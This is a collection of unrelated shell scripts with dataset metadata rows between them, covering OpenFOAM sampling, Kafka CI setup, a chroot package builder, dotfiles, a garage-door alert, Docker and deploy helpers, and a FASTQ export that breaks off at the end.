retry 60 checkCSVComplete $CS_ODLM_CSV ibm-common-services
if [ $? -ne 0 ]; then
echo "Error: timed out waiting for operators in openshift-operators project"
exit 1
fi
retry 60 checkCSVComplete $CS_NAMESPACE_CSV ibm-common-services
if [ $? -ne 0 ]; then
echo "Error: timed out waiting for operators in openshift-operators project"
exit 1
fi
echo "Wait for CommonService to come up"
retry 60 checkCommonServiceCRDComplete
echo "Patching CommonService ..."
oc patch CommonService common-service --type merge -p '{"spec":{"size":"small"}}' -n ibm-common-services
if [ $? -ne 0 ]; then
echo "Error patching CommonService"
exit 1
fi
# Update install progress
oc create cm cs-install-progress --from-literal=state=complete -n default --dry-run=client -o yaml | oc apply -f -
if [ $? -ne 0 ]; then
echo "Fatal error: Could not create cs-install-progress config map in project default"
exit 1
else
echo "IBM Common Service successfully installed"
exit 0
fi
| true
|
0b91b78e43ce51ed6c35cf3bcb571d02cb668e5c
|
Shell
|
Ulyouth/TurboLearner
|
/Simulations/Sampling/genSamples.sh
|
UTF-8
| 8,274
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
###########################################################################
# NAME: genSamples.sh
# AUTHOR: Ulyouth
# DATE: 10.06.2020
# DESC: A script to generate sCO2 case samples using OpenFOAM for
# varying Myong-Kasagi model coefficients. The coefficients
# at the moment are: A*, Cd
#
# Note: Bash's basic calculator "bc" was used since native bash
# scripts do not support floating point calculations.
#
# USAGE: genSamples.sh [CSV] [CASE] [YPLUSM] [PRTM] [PRT]
# Where:
# CSV is a .csv file containing a description of the
# coefficients to be sampled. Syntax below.
# CASE is a folder containing the OpenFOAM code template
# for the case to be sampled.
# YPLUSM is the y+ model to be used:
# 0=normal, 1=semi-local-scaling, 2=Wallin&Johannson
# PRTM is the Prandtl model to be use:
# 0=constant, 1=Bae, 2=oos, 3=Tien, 4=TWL
# PRT is the turbulent Prandtl number.
#
# Example: ./genSamples.sh coeffs.csv 42F 2 4 0.85
#
# The syntax of the CSV file is [a b c d e f].
# Where:
# a is the name of the coefficient.
# b is the initial value.
# c is the final value.
# d is the step.
# e is to toggle activation. (0=inactive; 1=active)
# f is a placeholder for the simulation loop.
# Must be the same as 'a'.
###########################################################################
#
# Save the time of the simulation start.
#
t0=$(date +%s)
#
# Check the command line arguments: all five are mandatory; otherwise
# print the usage text and exit with status 1.
#
if [ -z $1 ] || [ -z $2 ] || [ -z $3 ] || [ -z $4 ] || [ -z $5 ]; then
cat << EOF
DESC: A script to generate sCO2 case samples using OpenFOAM for
varying Myong-Kasagi model coefficients.
USAGE: genSamples.sh [CSV] [CASE] [YPLUSM] [PRTM] [PRT]
Where:
CSV is a .csv file containing a description of the
coefficients to be sampled. Syntax below.
CASE is a folder containing the OpenFOAM code template
for the case to be sampled.
YPLUSM is the y+ model to be used:
0=normal, 1=semi-local-scaling, 2=Wallin&Johannson
PRTM is the Prandtl model to be use:
0=constant, 1=Bae, 2=oos, 3=Tien, 4=TWL
PRT is the turbulent Prandtl number.
Example: ./genSamples.sh coeffs.csv 42F 2 4 0.85
The syntax of the CSV file is [a b c d e f]. Where:
a is the name of the coefficient
b is the initial value
c is the final value
d is the step
e is to toggle activation (0=inactive; 1=active)
f is a placeholder for the simulation loop.
Must be the same as 'a'.
EOF
exit 1
fi
#
# Define the model's static coefficients.
#
yPlus_Model=$3;
Prt_Model=$4;
Prt=$5;
#
# Define the names of the folder and path containing the OpenFOAM code for
# the desired case, and the locations of the RASProperties' file and where the
# sample results are saved.
#
case_folder=$2
bk_path="$(pwd)/${case_folder}"
case_path="${bk_path}_tmp"
RAS_path="${case_path}/constant/RASProperties"
dict_path="${case_path}/postProcessing/sampleDict"
echo
echo "Simulation case: ${case_folder}"
echo -n "Extracting coefficients from file ${1}. "
#
# Read from the CSV file the coefficients to be sampled.
# coeff_list is a flat array with stride 'i' (params per coefficient):
# [name, start, end, step, active, current] repeated per CSV row.
#
while IFS=, read -ra line
do
for x in ${line[@]}
do
coeff_list=(${coeff_list[@]} $x)
done
coeff_count=$((coeff_count+1))
done < $1
i=$((${#coeff_list[@]}/coeff_count)) # Number of params in every coefficient array
echo "Number of coefficients: ${coeff_count}."
#
# Read the contents of the RASProperties' file (abort if empty/missing).
#
RAS_file=$(<"${bk_path}/constant/RASProperties")
if [ -z "$RAS_file" ]; then
exit 1
fi
#
# Define the name of the simulation folder from the active coefficients.
#
sim_folder=""
for (( x=0; x<=coeff_count-1; x++ )); do
if (( $((coeff_list[x*i+4])) == 1 )); then
sim_folder="${sim_folder}_${coeff_list[x*i+0]}"
fi
done
if [ -z "$sim_folder" ]; then
echo "Please select at least one coefficient to be sampled."
exit 1
else
sim_folder="_${case_folder}_${yPlus_Model}_${Prt_Model}_Prt=${Prt}${sim_folder}"
sim_path="$(pwd)/${sim_folder}"
echo "Creating simulation folder ${sim_folder} at $(pwd)."
mkdir -p "${sim_path}"
fi
echo -e "Starting simulation. Details of the simulation can be found at log_tmp.\n"
#
# Loop through the coefficient values.
#
for (( x=coeff_count-1,skip=0; x>=0; x-- )); do
# Skip the coefficient if signaled.
if (( $((coeff_list[x*i+4])) == 0 )); then
continue
else
# Check if the value should not be skept.
if (( $((skip)) == 0 )); then
#
# Reset the files in the case folder back to original state.
#
rm -rf "${case_path}"
cp -rf "${bk_path}" "${case_path}"
#
# Define the name of the sample folder, log info and code to be added
# to the RASProperties file.
#
sample_folder=""
log=""
nl=$'\n'
code="myMyongKasagiKECoeffs${nl}{"
code="${code}${nl} Prt ${Prt};"
code="${code}${nl} yPlus_Model ${yPlus_Model};"
code="${code}${nl} Prt_Model ${Prt_Model};"
for (( y=0; y<=coeff_count-1; y++ )); do
if (( $((coeff_list[y*i+4])) == 1 )); then
sample_folder="${sample_folder}_${coeff_list[y*i+0]}=${coeff_list[y*i+5]}"
fi
log="${log}${coeff_list[y*i+0]}=${coeff_list[y*i+5]}"
if (( y != coeff_count-1)); then
log="${log}, "
fi
code="${code}${nl} ${coeff_list[y*i+0]} ${coeff_list[y*i+5]};"
done
sample_path="$(pwd)/${sim_folder}/${sample_folder}"
mkdir -p "${sample_path}"
code="${code}${nl}}"
echo -n "${log}. "
#
# Write the RASProperties file with the current coefficients.
#
echo "${code}" >> $RAS_path
#
# Run the simulation for the given coefficients.
#
echo -n "[PENDING]"
mybuoyantPimpleFoam -case "${case_path}" > log_tmp
echo -en "\b\b\b\b\b\b\b\b\b" # Remove the 'Pending' message status.
#
# Generate the desired results from the sampleDict dictionary
# and extract the latest time of the simulation.
#
post_log=$(postProcess -case "${case_path}" -func sampleDict -latestTime)
latestTime=$(echo "${post_log}" | sed -n 's/Time = //p')
#
# Check if the simulation completed successfully.
#
if (( $(echo "${latestTime} > 1.7" | bc -l) )); then
# If yes, copy the result files to the sample folder.
mv "${dict_path}/${latestTime}" "${dict_path}/${sample_folder}"
# Obtain the error value of the current sample.
error=$(python "../Evaluation/evalSamples.py" "${case_folder}" "$(pwd)/params.csv" 0 0 2>&1)
cp -rf "${dict_path}/${sample_folder}/." "$sample_path"
echo "[SUCCESS: e=${error}, t=${latestTime}]"
else
# If not, copy the simulation log to the sample folder.
cp -rf "${case_path}/log" "$sample_path"
echo "[ERROR: Check sample log]"
fi
fi
# Reset the skip trigger.
skip=0
# Increase the current value.
coeff_list[x*i+5]=$(echo "${coeff_list[x*i+5]} + ${coeff_list[x*i+3]}" | bc -l)
# Check if the current value is greater than the final value.
if (( $(echo "${coeff_list[x*i+5]} > ${coeff_list[x*i+2]}" | bc -l) )); then
# Reset the current value back to the initial value.
coeff_list[x*i+5]=$(echo "${coeff_list[x*i+1]}" | bc -l)
# Signal that the next value should be skept, since it is a duplicate.
skip=1
else
# Go back to beginning of the coefficient list.
x=coeff_count
fi
fi
done
#
# Calculate and report the total duration of the simulation run.
#
tf=$(date +%s)
t=$(date -ud @$(( tf - t0 )) +"$(( (tf-t0)/(3600*24) )) days %H hours %M minutes %S seconds")
echo -e "\nSimulation completed in ${t}."
| true
|
3f669f3c1e7c15a3d479fdb8ef6195e168f2ce66
|
Shell
|
doct15/example-node
|
/bin/startup.sh
|
UTF-8
| 421
| 2.796875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Container startup: warn about missing AWS settings, sync app config
# from S3, then launch the Node service.
# NOTE: the {{...}} mustache placeholders are substituted at template
# render time; after substitution each '-z' tests the rendered value.
if [ -z "{{AWS_ACCESS_KEY_ID}}" ]; then
echo "AWS_ACCESS_KEY_ID is empty"
fi
if [ -z "{{AWS_SECRET_ACCESS_KEY}}" ]; then
echo "AWS_SECRET_ACCESS_KEY is empty"
fi
if [ -z "{{&S3_CONFIG_BUCKET}}" ]; then
echo "S3_CONFIG_BUCKET is empty"
fi
echo '{{&S3_CONFIG_BUCKET}}'
# Pull the service configuration, list it for the container log, start app.
aws s3 sync {{&S3_CONFIG_BUCKET}} /data/apps/prod/module-service/conf
ls /data/apps/prod/module-service/conf
npm start
| true
|
97a2f0e9ef7312610c37ffce82e14a99402a0806
|
Shell
|
ajallooe/.dotfiles
|
/bash_profile
|
UTF-8
| 2,697
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Personal bash profile: editor, aliases, PATH, and ssh/scp helpers.
# Editor
export EDITOR="vim"
# Upgraded ls
alias ls='ls -GFh'
alias rm='rm -i'
# Setting path
homebrew=/usr/local/bin:/usr/local/sbin
export PATH=$homebrew:$PATH
export ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future
export PATH="/Users/ajallooe/settings:$PATH"
#export PYTHONPATH=/usr/local/lib/python3.4/site-packages:/usr/local/lib/python2.7/site-packages:$PYTHONPATH
function is_in {
    # is_in() -- succeed (0) when the whitespace-delimited list $1
    # contains the exact word $2; fail (1) otherwise.
    # (Assigns the global 'result' as a side effect, like the original.)
    local haystack="$1"
    local wanted="$2"
    result=1
    if [[ $haystack =~ (^|[[:space:]])"$wanted"($|[[:space:]]) ]] ; then
        result=0
    fi
    return $result
}
export -f is_in
export LESSOPEN="| /usr/local/bin/src-hilite-lesspipe.sh %s" # for OSX
# export LESSOPEN="| /usr/bin/src-hilite-lesspipe.sh %s" # for Linux
export LESS=' -R '
# requires source-highlight
alias emacs="/usr/local/Cellar/emacs/24.4/Emacs.app/Contents/MacOS/Emacs -nw"
# Handy shortcuts
alias ll='ls -GFlh'
alias txe="open -a TextEdit"
alias txm="open -a TextMate"
alias zth="zathura"
# alias st="open /Applications/Sublime\ Text\ 2.app/Contents/SharedSupport/bin/subl"
alias ssoh="ssh ohaton"
function scoh { ssh ohaton "tar -cjf \"$1\"" | tar -xvjf; }
export -f scoh
alias ssif="ssh innisfree"
function scif { ssh innisfree "tar -cjf \"$1\"" | tar -xvjf; }
export -f scif
alias ssch="ssh innisfree -t \"ssh chinook\""
function scch { ssh innisfree -t "ssh chinook \"tar -cjf \"$1\" \"" | tar -xvjf; }
export -f scch
alias sscn="ssh chinook"
function scif { ssh innisfree "tar -cjf \"$1\"" | tar -xvjf; }
export -f scif
function ssth { ssh innisfree -t "ssh chinook -t \"ssh \"$1\"\""; }
export -f ssth
function scth { ssh innisfree -t "ssh chinook -t \"ssh \"$1\" \"tar -cjf \"$2\" \"\"" | tar -xvjf; }
export -f scth
function sstc { ssh chinook -t "ssh \"$1\""; }
export -f sstc
function sctc { ssh innisfree -t "ssh \"$1\" \"tar -cjf \"$2\" \"" | tar -xvjf; }
export -f sctc
alias ssgb="sstc gamebuilder"
function scgb { sctc gamebuilder "$1"; }
export -f scgb
alias ssfc="sstc fire-creek"
function scfc { sctc fire-creek "$1"; }
export -f scfc
alias ssfp="sstc fire-point"
function scfp { sctc fire-point "$1"; }
export -f scfp
function sccsn { scp "$1" innisfree:/cshome/ajallooe/copystore/; }
export -f sccsn
alias cdwk="cd /Users/ajallooe/work"
alias cdfg="cd /Users/ajallooe/work/Research/Go/Fuego/"
alias cdex="cd /Users/ajallooe/work/exp/fuego/experiments"
alias exfg="/Users/ajallooe/work/Research/Go/Fuego/fuegomain/fuego"
# Terminal colors
export PS1="\n BASH [\[\033[95m\]\D{%Y-%m-%d}\[\033[m\] \[\033[95m\]\t\[\033[m\]]\n\[\033[91m\]\u\[\033[m\]@\[\033[32m\]\h\[\033[m\]:\[\033[93m\]\w\[\033[m\]\n\$ "
export CLICOLOR=1
export LSCOLORS=ExFxCxDxBxegedabagacad
| true
|
834a691366d24aa29f7e5308ba7c22d0a36703d1
|
Shell
|
ellipsis-index/zeekay-dot-files
|
/ellipsis.sh
|
UTF-8
| 489
| 3.03125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
mod.install() {
    # Install hook: link the shared dotfiles first, then the set for
    # the platform reported by ellipsis.platform (no-op for others).
    ellipsis.link_files "$mod_path/common"
    local platform
    platform="$(ellipsis.platform)"
    case "$platform" in
        cygwin*)  ellipsis.link_files "$mod_path/platform/cygwin" ;;
        darwin)   ellipsis.link_files "$mod_path/platform/osx" ;;
        freebsd)  ellipsis.link_files "$mod_path/platform/freebsd" ;;
        linux)    ellipsis.link_files "$mod_path/platform/linux" ;;
    esac
}
| true
|
aa06a4a35b3b0def7cc0785da55d72d280386011
|
Shell
|
mtrebot/script
|
/go
|
UTF-8
| 232
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
# Copy everything into ./script, then run the 'sync' expect script
# inside every subdirectory except "Servers".
cp * ./script
for D in *; do
    if [ -d "${D}" ] && [ "${D}" != "Servers" ]; then
        cd "${D}"
        echo "---===<<<*>>>===--- ${D} ----===<<<*>>>===---"
        expect ../sync
        cd ..
    fi
done
| true
|
7b05c4ef5ec722d2dfe630dada8278857b23d0df
|
Shell
|
stenstorp/aljos
|
/scripts/chroot-build.sh
|
UTF-8
| 3,812
| 3.921875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# chroot-build.sh -- build one component ($1) inside the target system
# root via chroot, optionally through qemu user-mode emulation.
source variables/variables.common
COMPONENT=$1
unset name version source _prepare _configure _make _install
# Each component supplies metadata (name/version/source) and the build
# phase functions (_prepare/_configure/_make/_install/_post).
source ${COMPONENTS_DIR}/${COMPONENT}/info
source ${COMPONENTS_DIR}/${COMPONENT}/build
filename="${source##*/}"
if [ -z "${folder}" ]; then
folder=${name}-${version}
fi
# NOTE(review): this existence check runs *after* the component files
# were already sourced above — confirm the ordering is intended.
if [ ! -e ${COMPONENTS_DIR}/${COMPONENT} ]; then
echo "Component \"${COMPONENT}\" not found"
exit 1
fi
# Recreate a clean /build directory inside the target root.
if [ -e ${LJOS}/build ]; then
sudo rm -rf ${LJOS}/build
fi
mkdir ${LJOS}/build
# Download the source archive once (cached in SOURCE_DIR), then extract.
# FIX: both the cache check and the extraction referenced the bogus
# command substitution $(unknown); use ${filename} (derived from
# ${source} above and otherwise unused) instead.
if [ ! -e "${SOURCE_DIR}/${filename}" ]; then
wget -P ${SOURCE_DIR} ${source}
fi
echo "$1: extracting..."
tar -C ${LJOS}/build -xf "${SOURCE_DIR}/${filename}"
# Record the build environment so the chrooted phases can source it.
echo "export THREADS=${THREADS}" >> ${LJOS}/build/component-build_info
echo "export LJOS_HOST=${LJOS_HOST}" >> ${LJOS}/build/component-build_info
echo "export LJOS_TARGET=${LJOS_TARGET}" >> ${LJOS}/build/component-build_info
echo "export LJOS_CPU=${LJOS_CPU}" >> ${LJOS}/build/component-build_info
echo "export LJOS_ARCH=${LJOS_ARCH}" >> ${LJOS}/build/component-build_info
echo "export LJOS_ENDIAN=${LJOS_ENDIAN}" >> ${LJOS}/build/component-build_info
echo "export LJOS_BITS=${LJOS_BITS}" >> ${LJOS}/build/component-build_info
cat ${COMPONENTS_DIR}/${COMPONENT}/info >> ${LJOS}/build/component-build_info
# Flatten the extracted top-level folder into /build.
mv ${LJOS}/build/${folder}/* ${LJOS}/build/
#mv ${LJOS}/build/${folder}/.* ${LJOS}/build/
rmdir ${LJOS}/build/${folder}
if [ "${LJOS_ARCH}" == "x86" ]; then
COMPILE_ARCH=i686
else
COMPILE_ARCH=${LJOS_ARCH}
fi
if [ "$(uname -m)" != "${COMPILE_ARCH}" ]; then
if [ -e "$(which ${LJOS_QEMU})" ]; then
cp `which ${LJOS_QEMU}` ${LJOS}/usr/bin/
else
echo "\"${LJOS_QEMU}\" not in path"
exit 1
fi
else
LJOS_QEMU=""
fi
if [ "${LJOS_ARCH}" == "x86" ] && [ "$(uname -m)" == "x86_64" ]; then
BITS="linux32"
else
BITS=""
fi
if [ ! -e "${LOG_DIR}/${COMPONENT}" ]; then
mkdir -p ${LOG_DIR}/${COMPONENT}
fi
# For each defined phase function, serialize its body into the chroot
# ('type | head | tail' strips the function wrapper lines) and execute it
# there, logging to ${LOG_DIR}/${COMPONENT}/.
if [ ! -z $(type -t _prepare) ]; then
type _prepare | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_prepare
echo "$1: preparing..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_prepare' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-prepare.log || exit 1
fi
if [ ! -z $(type -t _configure) ]; then
type _configure | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_configure
echo "$1: configuring..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_configure' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-configure.log || exit 1
fi
if [ ! -z $(type -t _make) ]; then
type _make | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_make
echo "$1: building..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_make' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-make.log || exit 1
fi
if [ ! -z $(type -t _install) ]; then
type _install | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_install
echo "$1: installing..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_install' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-install.log || exit 1
fi
if [ ! -z $(type -t _post) ]; then
type _post | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_post
echo "$1: post tasks..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_post' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-post.log || exit 1
fi
# Clean up the build dir and any copied qemu binary.
sudo rm -rf ${LJOS}/build
if [ -e ${LJOS}/usr/bin/${LJOS_QEMU} ]; then
sudo rm ${LJOS}/usr/bin/${LJOS_QEMU}
fi
| true
|
d66816cb287efd5ec95f8eed5c97d3b7fc07e819
|
Shell
|
dumbo25/garage-door
|
/usr/local/bin/garage.sh
|
UTF-8
| 1,673
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash
# check if the garage door is open.
# enter a crontab: */5 * * * * sudo /usr/local/bin/garage.sh
# If open send an alert and write to syslog
up=0
mobile='your-number@txt.att.net'
sensor=5
gpio -g mode $sensor down
sleep 1
# BUG FIX: read the door sensor state; $door was referenced below but was
# never assigned, so every [ "$door" -eq "$up" ] test errored out.
# With the pull-down configured above, 0 is taken to mean the door is up
# (matching up=0) — confirm against the actual switch wiring.
door=$(gpio -g read $sensor)
# get current time
currTime=`date +%k%M`
# get whether or not on vacation
# I get emails when SQLITE_BUSY occurs. So, changed timeout from 1000 to 20000. Seems like recommended solution.
vacation=$(sqlite3 -init <(echo .timeout 20000) /var/www/db/garagedoor.db "SELECT value FROM status WHERE name = \"vacation\"";)
# # if on vacation
if [ "$vacation" == "yes" ]
then
# and door is up
if [ "$door" -eq "$up" ]; then
logger rpiGarageOpener: Garage Door Open
echo "close the garage door" | mail -s "Garage Door Open and on vacation" $mobile
fi
# if not on vacation and time is between 10pm and midnight
elif [ "$vacation" == "no" ]
then
if [ $currTime -gt 2200 -a $currTime -lt 2400 ]
then
if [ "$door" -eq "$up" ]
then
logger rpiGarageOpener: Garage Door Open
echo "close the garage door" | mail -s "Garage Door Open late at night" $mobile
fi
# or, if time is less then 7:00am
elif [ $currTime -gt 0 -a $currTime -lt 700 ]
then
if [ "$door" -eq "$up" ]
then
logger rpiGarageOpener: Garage Door Open
echo "close the garage door" | mail -s "Garage Door Open to early" $mobile
fi
fi
fi
# some debug outputs
# echo "up = $up"
# echo "door = $door"
# echo "vacation = $vacation"
# echo "time = $currTime"
exit 0
| true
|
5972946224d522080a28b171e28daf441b1743b6
|
Shell
|
jeroldleslie/deployments
|
/ansible/roles/odyssey_event_gen_code/templates/odyssey-event-gen.j2
|
UTF-8
| 3,280
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
# Init-style control script for the Odyssey Event Gen service (runs an
# embedded Tomcat via maven). The {{odyssey_home}} placeholders are
# filled in by the Ansible/Jinja2 template at deploy time.
ODYSSEY_EVENT_GEN_BIN={{odyssey_home}}/odyssey-event-gen/bin
DESC="Odyssey Event Gen"
NAME=Odyssey_Event_Gen
DAEMON="mvn -Dmaven.tomcat.port=8181 tomcat:run"
DAEMON_ARGS=" -f {{odyssey_home}}/odyssey-event-gen/pom.xml"
PIDFILE=$ODYSSEY_EVENT_GEN_BIN/$NAME.pid
SCRIPTNAME=$NAME
LOG=$ODYSSEY_EVENT_GEN_BIN/$NAME.log
# pid_file_exists -- succeed when the daemon's PID file is present.
pid_file_exists() {
    test -f "$PIDFILE"
}
# do_start -- (re)start the Odyssey Event Gen daemon.
# If a PID file exists, the previously recorded process is killed first;
# the daemon is then launched in the background and its PID recorded.
do_start() {
  if pid_file_exists
  then
    echo "Odyssey Event Gen is already running. So Killing..."
    # BUG FIX: read the recorded PID before killing — $PID was unset
    # here, so 'kill -15' was called with no target.
    PID=$(cat "$PIDFILE")
    KILL=$(kill -15 $PID)
    rm $PIDFILE
    sleep 1
    # BUG FIX: the message started with the broken escape '\O'.
    echo "Odyssey Event Gen (PID:$PID) killed"
  fi
  $DAEMON $DAEMON_ARGS 1>"$LOG" 2>&1 &
  PID=$!
  echo $PID > "$PIDFILE"
  # BUG FIX: '[ "$PID" > 0 ]' was an output redirection (it created a
  # file named '0' and always succeeded); use a numeric comparison.
  if [ "$PID" -gt 0 ]
  then
    echo "Odyssey Event Gen started with pid $PID"
  else
    echo "Odyssey Event Gen could not be started"
  fi
}
# do_status -- report whether the recorded PID is a live process.
# Removes a stale PID file when the process is gone.
# NOTE(review): 'ps ax | grep $PID' can match the PID as a substring of
# another process's line; pgrep would be more precise — confirm.
do_status() {
if pid_file_exists
then
PID=$(cat $PIDFILE)
STATUS=$(ps ax | grep $PID | grep -v grep | awk '{print $1}')
if [ "$STATUS" == "$PID" ]
then
echo "Odyssey Event Gen is running on proccess $PID"
else
echo "Odyssey Event Gen is NOT running"
rm $PIDFILE
fi
else
echo "Odyssey Event Gen is NOT running"
fi
}
# do_stop -- SIGTERM the recorded process (if alive) and remove the PID
# file; cleans up a stale PID file when the process is already gone.
# NOTE(review): the "\Odyssey ... killed" message contains a stray
# backslash from a broken escape sequence — confirm intended text.
do_stop() {
if pid_file_exists
then
PID=$(cat $PIDFILE)
STATUS=$(ps ax | grep $PID | grep -v grep | awk '{print $1}')
if [ "$STATUS" == "$PID" ]
then
echo "Killing Odyssey Event Gen...."
KILL=$(kill -15 $PID)
rm $PIDFILE
sleep 1
echo -e "\Odyssey Event Gen (PID:$PID) killed"
else
echo "Odyssey Event Gen is NOT running"
rm $PIDFILE
fi
else
echo "Odyssey Event Gen is NOT running"
fi
}
case "$1" in
start)
do_start;;
stop)
do_stop
;;
status)
do_status
;;
restart)
do_stop
do_start
;;
*)
echo "Usage: $SCRIPTNAME {start|stop|status|restart}" >&2
exit 3
;;
esac
exit 0
| true
|
cc74b5d50f04ca0453de45aab3c1617c6a455d99
|
Shell
|
Chacon11/bddExample
|
/travis-kafka.sh
|
UTF-8
| 414
| 2.515625
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/sh
# CI helper: download Kafka 1.0.0 (cached as kafka.tgz), unpack it, and
# start ZooKeeper and a Kafka broker as background daemons.
set -eu
MIRROR=http://apache.rediris.es/kafka/1.0.0/kafka_2.11-1.0.0.tgz
test -f kafka.tgz || wget $MIRROR -O kafka.tgz
mkdir -p kafka && tar xzf kafka.tgz -C kafka --strip-components 1
kafka/bin/zookeeper-server-start.sh -daemon kafka/config/zookeeper.properties
# Allow tests to delete topics they create.
echo "delete.topic.enable=true" >> kafka/config/server.properties
kafka/bin/kafka-server-start.sh -daemon kafka/config/server.properties
| true
|
aac4a062a1cd666143b26cf4948a382243170fe8
|
Shell
|
jzbor/dotfiles
|
/.scripts/dwm/dwmvolume.sh
|
UTF-8
| 1,277
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/sh
# Dependencies: volume.sh pacmd pactl sh xmenu
# select_volume -- show an xmenu of volume presets (100%..10%); the
# chosen line's command is piped to sh for execution.
# NOTE(review): the 100% entry invokes volume.sh while every other entry
# uses pademelon-tools — confirm this inconsistency is intentional.
select_volume () {
menu=" 100% volume.sh --set 100
 90% pademelon-tools volume --set 90
 80% pademelon-tools volume --set 80
 70% pademelon-tools volume --set 70
 60% pademelon-tools volume --set 60
 50% pademelon-tools volume --set 50
 40% pademelon-tools volume --set 40
 30% pademelon-tools volume --set 30
 20% pademelon-tools volume --set 20
 10% pademelon-tools volume --set 10"
echo "$menu" | xmenu | sh
}
gen_output_menu () {
# Emit one xmenu line per PulseAudio sink:
# "<tab><index> <short-name><tab>pacmd set-default-sink <index>"
pactl list short sinks | cut -f1,2 | sed 's/\(.*\)\t.*\.\(.*\)/\t\1 \2\tpacmd set-default-sink \1/'
}
gen_input_menu () {
# Emit one xmenu line per PulseAudio source (same shape as
# gen_output_menu, but selecting the default source).
pactl list short sources | cut -f1,2 | sed 's/\(.*\)\t.*\.\(.*\)/\t\1 \2\tpacmd set-default-source \1/'
}
audio_menu () {
# Full audio menu: mute toggles, dynamic output/input submenus, and
# shortcuts to pavucontrol/paprefs; the chosen command is run via sh.
menu="ﱝ Mute pademelon-tools volume --mute toggle
 Mute Microphone pademelon-tools volume --mute-input toggle
蓼 Select Output
$(gen_output_menu)
 Select Input
$(gen_input_menu)
ﲿ Audio Setup pavucontrol
漣 Pulse Settings paprefs"
echo "$menu" | xmenu | sh
}
# Dispatch on the dwm status-bar mouse button: 1=left opens the preset
# menu, 2=middle toggles mute, 3=right opens the full audio menu,
# 4/5=scroll wheel adjusts volume by 5%.
case $1 in
1) select_volume ;;
2) pademelon-tools volume --mute toggle ;;
3) audio_menu ;;
4) pademelon-tools volume --inc 5 ;;
5) pademelon-tools volume --dec 5;;
esac
| true
|
b3aa36b3afffce772f7a5c9574bff92a9335f500
|
Shell
|
nanchengking/fische
|
/deploy.sh
|
UTF-8
| 315
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Package the project directory into a tarball and push it to the
# Ali server via ali_scp.
cd ..
pwd
# Create the compressed archive (removing any previous one first).
project=fische
echo '删除原有压缩包……'
rm ./${project}.tar.gz
echo '开始压缩新包'
tar zcvf ${project}.tar.gz ./${project}
echo '压缩结束,开始上传新压缩包'
ali_scp push ${project}.tar.gz
# To extract on the remote side: tar zxvf pageCenter.tar.gz
echo '上传成功'
| true
|
bcafcf95935a9e2c455a1cea786c429896e61e9a
|
Shell
|
pedrohsdias/php-laravel
|
/docker-entrypoint.sh
|
UTF-8
| 775
| 3.25
| 3
|
[] |
no_license
|
#!/bin/bash
# Container entrypoint: bootstrap the Laravel project named by $NOME_PROJETO
# (unpacking it on first run), then hand control to Apache in the foreground.
DIR="/var/www/html/$NOME_PROJETO/"
if [ "$(ls -A "$DIR")" ]; then
    # Project already unpacked; check whether composer deps were installed.
    # BUGFIX: the original wrote `[! ...]` (no space after '['), which bash
    # tried to run as a command named "[!"; the test always failed, so the
    # "Vendor não existe" warning could never be shown.
    if [ ! "$(ls -A "$DIR/vendor/" 2>/dev/null)" ]; then
        printf "\t#########################\n\t### Vendor não existe ###\n\t#########################\n\n Para baixar dependencias execute: docker run --rm -it -v $NOME_PROJETO:/app composer install --ignore-platform-reqs --no-scripts\n"
    else
        printf "\t#########################\n\t### Nada a fazer! ###\n\t#########################\n"
    fi
else
    # First run: unpack the project archive and generate the Laravel app key.
    printf "\t#########################\n\t### Criando projeto ###\n\t#########################\n"
    unzip -q "/var/www/$NOME_PROJETO.zip" -d /var/www/html/
    chmod -R 777 "/var/www/html/$NOME_PROJETO/"
    php "/var/www/html/$NOME_PROJETO/artisan" key:generate
fi
apache2-foreground
| true
|
b89f88cd84e504e13d2d2b60f95133d716b84c7c
|
Shell
|
rache1shin/ssurnd
|
/DB/FASTQ_EXPORT/myfastqexport.sh
|
UTF-8
| 536
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
# Export FASTQ records stored in the database back into a FASTQ file.
#   $1 - run/collection prefix
#   $2 - output FASTQ filename (extension stripped to build the column name)
# FASTQ_EXPORT_REFER.php returns empty for a full export, otherwise the
# reference used to join against SAM seq/qual data.
F_OR_P=$(php FASTQ_EXPORT_REFER.php "$1" "$2")
FASTQ_COL="$1_${2%.*}_F"
# Quote the test operand: the original unquoted `-z $F_OR_P` broke whenever
# the PHP helper returned nothing-with-whitespace or multiple words.
if [ -z "$F_OR_P" ]
then
	# Full export: rows are "<order>\t<fields...>" — sort by order, drop the
	# order column, and unfold tab-separated fields into FASTQ lines.
	# (sort reads the file directly; the original `cat | sort` was redundant.)
	php FULL_FASTQ_EXPORT.php "$FASTQ_COL" > BEFORE_SORT_FASTQ.txt
	sort -k1,1 -n BEFORE_SORT_FASTQ.txt | cut -f 2- | tr "\t" "\n" > "$2"
